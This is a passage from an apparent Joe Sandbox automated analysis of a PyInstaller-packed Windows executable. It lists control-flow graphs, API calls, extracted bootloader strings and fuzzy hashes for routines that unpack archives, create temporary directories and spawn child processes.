19313->19312 19314 7ff6404fe278 6 API calls 19313->19314 19314->19312

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 0 7ff6404e1000-7ff6404e3536 call 7ff6404ef138 call 7ff6404ef140 call 7ff6404ebb70 call 7ff6404f4700 call 7ff6404f4794 call 7ff6404e33e0 14 7ff6404e3544-7ff6404e3566 call 7ff6404e18f0 0->14 15 7ff6404e3538-7ff6404e353f 0->15 21 7ff6404e356c-7ff6404e3583 call 7ff6404e1bf0 14->21 22 7ff6404e3736-7ff6404e374c call 7ff6404e3f70 14->22 16 7ff6404e371a-7ff6404e3735 call 7ff6404eb870 15->16 26 7ff6404e3588-7ff6404e35c1 21->26 27 7ff6404e3785-7ff6404e379a call 7ff6404e25f0 22->27 28 7ff6404e374e-7ff6404e377b call 7ff6404e76a0 22->28 29 7ff6404e3653-7ff6404e366d call 7ff6404e7e10 26->29 30 7ff6404e35c7-7ff6404e35cb 26->30 44 7ff6404e3712 27->44 41 7ff6404e379f-7ff6404e37be call 7ff6404e1bf0 28->41 42 7ff6404e377d-7ff6404e3780 call 7ff6404ef36c 28->42 45 7ff6404e3695-7ff6404e369c 29->45 46 7ff6404e366f-7ff6404e3675 29->46 34 7ff6404e35cd-7ff6404e35e5 call 7ff6404f4560 30->34 35 7ff6404e3638-7ff6404e364d call 7ff6404e18e0 30->35 54 7ff6404e35f2-7ff6404e360a call 7ff6404f4560 34->54 55 7ff6404e35e7-7ff6404e35eb 34->55 35->29 35->30 64 7ff6404e37c1-7ff6404e37ca 41->64 42->27 44->16 48 7ff6404e36a2-7ff6404e36c0 call 7ff6404e7e10 call 7ff6404e7f80 45->48 49 7ff6404e3844-7ff6404e3863 call 7ff6404e3e90 45->49 52 7ff6404e3682-7ff6404e3690 call 7ff6404f415c 46->52 53 7ff6404e3677-7ff6404e3680 46->53 78 7ff6404e380f-7ff6404e381e call 7ff6404e8400 48->78 79 7ff6404e36c6-7ff6404e36c9 48->79 69 7ff6404e3865-7ff6404e386f call 7ff6404e3fe0 49->69 70 7ff6404e3871-7ff6404e3882 call 7ff6404e1bf0 49->70 52->45 53->52 66 7ff6404e360c-7ff6404e3610 54->66 67 7ff6404e3617-7ff6404e362f call 7ff6404f4560 54->67 55->54 64->64 65 7ff6404e37cc-7ff6404e37e9 call 7ff6404e18f0 64->65 65->26 82 7ff6404e37ef-7ff6404e3800 call 7ff6404e25f0 
65->82 66->67 67->35 83 7ff6404e3631 67->83 81 7ff6404e3887-7ff6404e38a1 call 7ff6404e86b0 69->81 70->81 93 7ff6404e3820 78->93 94 7ff6404e382c-7ff6404e382f call 7ff6404e7c40 78->94 79->78 84 7ff6404e36cf-7ff6404e36f6 call 7ff6404e1bf0 79->84 95 7ff6404e38a3 81->95 96 7ff6404e38af-7ff6404e38c1 SetDllDirectoryW 81->96 82->44 83->35 99 7ff6404e3805-7ff6404e380d call 7ff6404f415c 84->99 100 7ff6404e36fc-7ff6404e3703 call 7ff6404e25f0 84->100 93->94 102 7ff6404e3834-7ff6404e3836 94->102 95->96 97 7ff6404e38c3-7ff6404e38ca 96->97 98 7ff6404e38d0-7ff6404e38ec call 7ff6404e6560 call 7ff6404e6b00 96->98 97->98 103 7ff6404e3a50-7ff6404e3a58 97->103 118 7ff6404e38ee-7ff6404e38f4 98->118 119 7ff6404e3947-7ff6404e394a call 7ff6404e6510 98->119 99->81 110 7ff6404e3708-7ff6404e370a 100->110 102->81 107 7ff6404e3838 102->107 111 7ff6404e3a5a-7ff6404e3a77 PostMessageW GetMessageW 103->111 112 7ff6404e3a7d-7ff6404e3aaf call 7ff6404e33d0 call 7ff6404e3080 call 7ff6404e33a0 call 7ff6404e6780 call 7ff6404e6510 103->112 107->49 110->44 111->112 121 7ff6404e390e-7ff6404e3918 call 7ff6404e6970 118->121 122 7ff6404e38f6-7ff6404e3903 call 7ff6404e65a0 118->122 126 7ff6404e394f-7ff6404e3956 119->126 135 7ff6404e3923-7ff6404e3931 call 7ff6404e6cd0 121->135 136 7ff6404e391a-7ff6404e3921 121->136 122->121 133 7ff6404e3905-7ff6404e390c 122->133 126->103 130 7ff6404e395c-7ff6404e3966 call 7ff6404e30e0 126->130 130->110 144 7ff6404e396c-7ff6404e3980 call 7ff6404e83e0 130->144 137 7ff6404e393a-7ff6404e3942 call 7ff6404e2870 call 7ff6404e6780 133->137 135->126 145 7ff6404e3933 135->145 136->137 137->119 151 7ff6404e3982-7ff6404e399f PostMessageW GetMessageW 144->151 152 7ff6404e39a5-7ff6404e39e1 call 7ff6404e7f20 call 7ff6404e7fc0 call 7ff6404e6780 call 7ff6404e6510 call 7ff6404e7ec0 144->152 145->137 151->152 162 7ff6404e39e6-7ff6404e39e8 152->162 163 7ff6404e39ea-7ff6404e3a00 call 7ff6404e81f0 call 7ff6404e7ec0 162->163 164 7ff6404e3a3d-7ff6404e3a4b call 7ff6404e18a0 162->164 163->164 171 
7ff6404e3a02-7ff6404e3a10 163->171 164->110 172 7ff6404e3a12-7ff6404e3a2c call 7ff6404e25f0 call 7ff6404e18a0 171->172 173 7ff6404e3a31-7ff6404e3a38 call 7ff6404e2870 171->173 172->110 173->164
Strings
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: FileModuleName
• String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-runtime-tmpdir
• API String ID: 514040917-585287483
• Opcode ID: 24eb870da8ca21e580c9e75daa874e24e3f9aac631933096159888eb5afdb10b
• Instruction ID: b41771169caa7e53486d63186ad72cddfcc7f537cb3ea71f10036f4f1d67ffa6
• Opcode Fuzzy Hash: 24eb870da8ca21e580c9e75daa874e24e3f9aac631933096159888eb5afdb10b
• Instruction Fuzzy Hash: FEF17B61A0C6A2F1FA1AFB21D5582FD62A1EF95784F844032DA5DC37D6EF2CE558C380

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 305 7ff640504f10-7ff640504f4b call 7ff640504898 call 7ff6405048a0 call 7ff640504908 312 7ff640505175-7ff6405051c1 call 7ff6404f9c10 call 7ff640504898 call 7ff6405048a0 call 7ff640504908 305->312 313 7ff640504f51-7ff640504f5c call 7ff6405048a8 305->313 338 7ff6405052ff-7ff64050536d call 7ff6404f9c10 call 7ff640500888 312->338 339 7ff6405051c7-7ff6405051d2 call 7ff6405048a8 312->339 313->312 319 7ff640504f62-7ff640504f6c 313->319 321 7ff640504f8e-7ff640504f92 319->321 322 7ff640504f6e-7ff640504f71 319->322 324 7ff640504f95-7ff640504f9d 321->324 323 7ff640504f74-7ff640504f7f 322->323 327 7ff640504f81-7ff640504f88 323->327 328 7ff640504f8a-7ff640504f8c 323->328 324->324 329 7ff640504f9f-7ff640504fb2 call 7ff6404fc90c 324->329 327->323 327->328 328->321 331 7ff640504fbb-7ff640504fc9 328->331 336 7ff640504fb4-7ff640504fb6 call 7ff6404f9c58 329->336 337 7ff640504fca-7ff640504fd6 call 7ff6404f9c58 329->337 336->331 347 7ff640504fdd-7ff640504fe5 337->347 358 7ff64050536f-7ff640505376 338->358 359 7ff64050537b-7ff64050537e 338->359 339->338 348 7ff6405051d8-7ff6405051e3 call 7ff6405048d8 339->348 347->347 350 7ff640504fe7-7ff640504ff8 call 7ff6404ff784 347->350 348->338 357 7ff6405051e9-7ff64050520c call 7ff6404f9c58 GetTimeZoneInformation 348->357 350->312 360 7ff640504ffe-7ff640505054 call 7ff6405097e0 * 4 call 7ff640504e2c 350->360 376 7ff6405052d4-7ff6405052fe call 7ff640504890 call 7ff640504880 call 7ff640504888 357->376 377 7ff640505212-7ff640505233 357->377 365 7ff64050540b-7ff64050540e 358->365 362 7ff6405053b5-7ff6405053c8 call 7ff6404fc90c 359->362 363 7ff640505380 359->363 418 7ff640505056-7ff64050505a 360->418 381 7ff6405053d3-7ff6405053ee call 7ff640500888 362->381 382 7ff6405053ca 362->382 367 
7ff640505383 363->367 365->367 368 7ff640505414-7ff64050541c call 7ff640504f10 365->368 372 7ff640505388-7ff6405053b4 call 7ff6404f9c58 call 7ff6404eb870 367->372 373 7ff640505383 call 7ff64050518c 367->373 368->372 373->372 383 7ff640505235-7ff64050523b 377->383 384 7ff64050523e-7ff640505245 377->384 404 7ff6405053f5-7ff640505407 call 7ff6404f9c58 381->404 405 7ff6405053f0-7ff6405053f3 381->405 392 7ff6405053cc-7ff6405053d1 call 7ff6404f9c58 382->392 383->384 386 7ff640505259 384->386 387 7ff640505247-7ff64050524f 384->387 398 7ff64050525b-7ff6405052cf call 7ff6405097e0 * 4 call 7ff640501e6c call 7ff640505424 * 2 386->398 387->386 393 7ff640505251-7ff640505257 387->393 392->363 393->398 398->376 404->365 405->392 420 7ff640505060-7ff640505064 418->420 421 7ff64050505c 418->421 420->418 423 7ff640505066-7ff64050508b call 7ff6404f5e68 420->423 421->420 428 7ff64050508e-7ff640505092 423->428 430 7ff640505094-7ff64050509f 428->430 431 7ff6405050a1-7ff6405050a5 428->431 430->431 433 7ff6405050a7-7ff6405050ab 430->433 431->428 435 7ff6405050ad-7ff6405050d5 call 7ff6404f5e68 433->435 436 7ff64050512c-7ff640505130 433->436 445 7ff6405050f3-7ff6405050f7 435->445 446 7ff6405050d7 435->446 438 7ff640505132-7ff640505134 436->438 439 7ff640505137-7ff640505144 436->439 438->439 441 7ff64050515f-7ff64050516e call 7ff640504890 call 7ff640504880 439->441 442 7ff640505146-7ff64050515c call 7ff640504e2c 439->442 441->312 442->441 445->436 451 7ff6405050f9-7ff640505117 call 7ff6404f5e68 445->451 449 7ff6405050da-7ff6405050e1 446->449 449->445 452 7ff6405050e3-7ff6405050f1 449->452 457 7ff640505123-7ff64050512a 451->457 452->445 452->449 457->436 458 7ff640505119-7ff64050511d 457->458 458->436 459 7ff64050511f 458->459 459->457
APIs
• _get_daylight.LIBCMT ref: 00007FF640504F55
  • Part of subcall function 00007FF6405048A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6405048BC
  • Part of subcall function 00007FF6404F9C58: RtlFreeHeap.NTDLL(?,?,?,00007FF640502032,?,?,?,00007FF64050206F,?,?,00000000,00007FF640502535,?,?,?,00007FF640502467), ref: 00007FF6404F9C6E
  • Part of subcall function 00007FF6404F9C58: GetLastError.KERNEL32(?,?,?,00007FF640502032,?,?,?,00007FF64050206F,?,?,00000000,00007FF640502535,?,?,?,00007FF640502467), ref: 00007FF6404F9C78
  • Part of subcall function 00007FF6404F9C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6404F9BEF,?,?,?,?,?,00007FF6404F9ADA), ref: 00007FF6404F9C19
  • Part of subcall function 00007FF6404F9C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6404F9BEF,?,?,?,?,?,00007FF6404F9ADA), ref: 00007FF6404F9C3E
• _get_daylight.LIBCMT ref: 00007FF640504F44
  • Part of subcall function 00007FF640504908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF64050491C
• _get_daylight.LIBCMT ref: 00007FF6405051BA
• _get_daylight.LIBCMT ref: 00007FF6405051CB
• _get_daylight.LIBCMT ref: 00007FF6405051DC
• GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF64050541C), ref: 00007FF640505203
Strings
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
• String ID: Eastern Standard Time$Eastern Summer Time
• API String ID: 4070488512-239921721
• Opcode ID: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
• Instruction ID: 7e4a4c9c830baa433aa96951ff4f0cbac14d7fc1549b2dded7bfed066c782698
• Opcode Fuzzy Hash: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
• Instruction Fuzzy Hash: E3D1C176E1C262A6E728FF21D6502BE6391EF46788F448035EA6D87786DF3CE841C740

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 490 7ff640505c74-7ff640505ce7 call 7ff6405059a8 493 7ff640505d01-7ff640505d0b call 7ff6404f7830 490->493 494 7ff640505ce9-7ff640505cf2 call 7ff6404f43d4 490->494 499 7ff640505d0d-7ff640505d24 call 7ff6404f43d4 call 7ff6404f43f4 493->499 500 7ff640505d26-7ff640505d8f CreateFileW 493->500 501 7ff640505cf5-7ff640505cfc call 7ff6404f43f4 494->501 499->501 504 7ff640505d91-7ff640505d97 500->504 505 7ff640505e0c-7ff640505e17 GetFileType 500->505 512 7ff640506042-7ff640506062 501->512 510 7ff640505dd9-7ff640505e07 GetLastError call 7ff6404f4368 504->510 511 7ff640505d99-7ff640505d9d 504->511 507 7ff640505e6a-7ff640505e71 505->507 508 7ff640505e19-7ff640505e54 GetLastError call 7ff6404f4368 CloseHandle 505->508 515 7ff640505e73-7ff640505e77 507->515 516 7ff640505e79-7ff640505e7c 507->516 508->501 524 7ff640505e5a-7ff640505e65 call 7ff6404f43f4 508->524 510->501 511->510 517 7ff640505d9f-7ff640505dd7 CreateFileW 511->517 522 7ff640505e82-7ff640505ed7 call 7ff6404f7748 515->522 516->522 523 7ff640505e7e 516->523 517->505 517->510 529 7ff640505ed9-7ff640505ee5 call 7ff640505bb0 522->529 530 7ff640505ef6-7ff640505f27 call 7ff640505728 522->530 523->522 524->501 529->530 535 7ff640505ee7 529->535 536 7ff640505f2d-7ff640505f6f 530->536 537 7ff640505f29-7ff640505f2b 530->537 538 7ff640505ee9-7ff640505ef1 call 7ff6404f9dd0 535->538 539 7ff640505f91-7ff640505f9c 536->539 540 7ff640505f71-7ff640505f75 536->540 537->538 538->512 543 7ff640505fa2-7ff640505fa6 539->543 544 7ff640506040 539->544 540->539 542 7ff640505f77-7ff640505f8c 540->542 542->539 543->544 546 7ff640505fac-7ff640505ff1 CloseHandle CreateFileW 543->546 544->512 547 7ff640505ff3-7ff640506021 GetLastError call 7ff6404f4368 call 7ff6404f7970 546->547 548 
7ff640506026-7ff64050603b 546->548 547->548 548->544
APIs
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
• String ID:
• API String ID: 1617910340-0
• Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
• Instruction ID: 96457cfd391f5a6e961bd355bdc95e6a6cce5f6f06dd05e2cbaebf67e8b3e16c
• Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
• Instruction Fuzzy Hash: 0BC1DF32B2CA5296EB14FF68C5906AD3765FB8AB98B010235DF2E97794CF38E551C300

Control-flow Graph

APIs
• FindFirstFileW.KERNELBASE(?,00007FF6404E7EF9,00007FF6404E39E6), ref: 00007FF6404E7A1B
• RemoveDirectoryW.KERNEL32(?,00007FF6404E7EF9,00007FF6404E39E6), ref: 00007FF6404E7A9E
• DeleteFileW.KERNELBASE(?,00007FF6404E7EF9,00007FF6404E39E6), ref: 00007FF6404E7ABD
• FindNextFileW.KERNELBASE(?,00007FF6404E7EF9,00007FF6404E39E6), ref: 00007FF6404E7ACB
• FindClose.KERNELBASE(?,00007FF6404E7EF9,00007FF6404E39E6), ref: 00007FF6404E7ADC
• RemoveDirectoryW.KERNELBASE(?,00007FF6404E7EF9,00007FF6404E39E6), ref: 00007FF6404E7AE5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
• String ID: %s\*
• API String ID: 1057558799-766152087
• Opcode ID: 28b17b752644ad79b76fdaecccd908953f702e209cd2b6248263d266171aeab9
• Instruction ID: 135ee184f5db4f079a8e8967783671618695dee313c272bd813e7931e680f166
• Opcode Fuzzy Hash: 28b17b752644ad79b76fdaecccd908953f702e209cd2b6248263d266171aeab9
• Instruction Fuzzy Hash: 0A417321A0C562E5EA20FB24E5949BD6360FFA5764F440632D9ADC37D4DF3CE64AC780

Control-flow Graph

APIs
• _get_daylight.LIBCMT ref: 00007FF6405051BA
  • Part of subcall function 00007FF640504908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF64050491C
• _get_daylight.LIBCMT ref: 00007FF6405051CB
  • Part of subcall function 00007FF6405048A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6405048BC
• _get_daylight.LIBCMT ref: 00007FF6405051DC
  • Part of subcall function 00007FF6405048D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6405048EC
  • Part of subcall function 00007FF6404F9C58: RtlFreeHeap.NTDLL(?,?,?,00007FF640502032,?,?,?,00007FF64050206F,?,?,00000000,00007FF640502535,?,?,?,00007FF640502467), ref: 00007FF6404F9C6E
  • Part of subcall function 00007FF6404F9C58: GetLastError.KERNEL32(?,?,?,00007FF640502032,?,?,?,00007FF64050206F,?,?,00000000,00007FF640502535,?,?,?,00007FF640502467), ref: 00007FF6404F9C78
• GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF64050541C), ref: 00007FF640505203
Strings
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
• String ID: Eastern Standard Time$Eastern Summer Time
• API String ID: 3458911817-239921721
• Opcode ID: ae64d4b013316384daf219013b3406c3cfe35626df30cbdeb691f729cbc9c9de
• Instruction ID: b58667a0859c4565491414ec19ff1220c40c75b2265e47e50320d6277c7c88b0
• Opcode Fuzzy Hash: ae64d4b013316384daf219013b3406c3cfe35626df30cbdeb691f729cbc9c9de
• Instruction Fuzzy Hash: 8F51A336A0C662A6E718FF21DA811AD6760FF4A788F444539EA2DC7796DF3CE440CB40
APIs
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
• Instruction ID: 5fe66202e177d99c7f807aff829b301774400ae6d1a0f4e7f2fd14126836dceb
• Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
• Instruction Fuzzy Hash: 45F0A432A1C652D6FB70FB60B59836A7350EB44328F040239D96D427D4CF7CD058CB00
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1010374628-0
                                                                                                                                                                                                                                                            • Opcode ID: 2b6c2d1e4c043c62936e9dac6caf21e199e31a345cf4845f2c7219b702089de4
                                                                                                                                                                                                                                                            • Instruction ID: eec9e4a028447adb97fbaa17f0f7e0e33bc95f8252d58717aefef1821848cd61
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b6c2d1e4c043c62936e9dac6caf21e199e31a345cf4845f2c7219b702089de4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A902E221B1D6B7A1FE68FB1195402BE228AEF42BA8F444639DD6DC73D2DE3CE4419710

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: _fread_nolock$Message
• String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
• API String ID: 677216364-3497178890
• Opcode ID: 236455c93dc43fd7a620dd61a6bb9a5e6f0e22496eee16819a67f7c28e7b8b6a
• Instruction ID: 6bbb6f01bdc374e6d4f218129cfe3cf7c1562051f67e955ab5da4f0e7476a31b
• Opcode Fuzzy Hash: 236455c93dc43fd7a620dd61a6bb9a5e6f0e22496eee16819a67f7c28e7b8b6a
• Instruction Fuzzy Hash: 2671C231B1C6A6E9EB24FB24D5902BD2390FF89784F444035D98DC77AAEE6CE5448B80

Control-flow Graph
Strings
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: Message
• String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
• API String ID: 2030045667-1550345328
• Opcode ID: da3c2283609267b7beca66522936ce60a31ed649130e46d0b9ee1e579e4b20c7
• Instruction ID: dfd4575e4f547f119721587526c5d570a059d85c798b5f96c23ea6539c55306f
• Opcode Fuzzy Hash: da3c2283609267b7beca66522936ce60a31ed649130e46d0b9ee1e579e4b20c7
• Instruction Fuzzy Hash: AC51AD61B0C663F2EA14FB25AA405B923A1FF85B98F444131EE1D87BA5EF7CE5548380

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
• String ID: CreateProcessW$Failed to create child process!
• API String ID: 2895956056-699529898
• Opcode ID: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
• Instruction ID: 47de76dc5fa4126ef7c5004b4db62545672ab9370504d5136caecccf2e9b28ea
• Opcode Fuzzy Hash: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
• Instruction Fuzzy Hash: EF41FB31A1CB9291EA20BB64E4952AEB2A5FB89364F500335E6AD877D9DF7CD0448B40

Control-flow Graph
Strings
Memory Dump Source
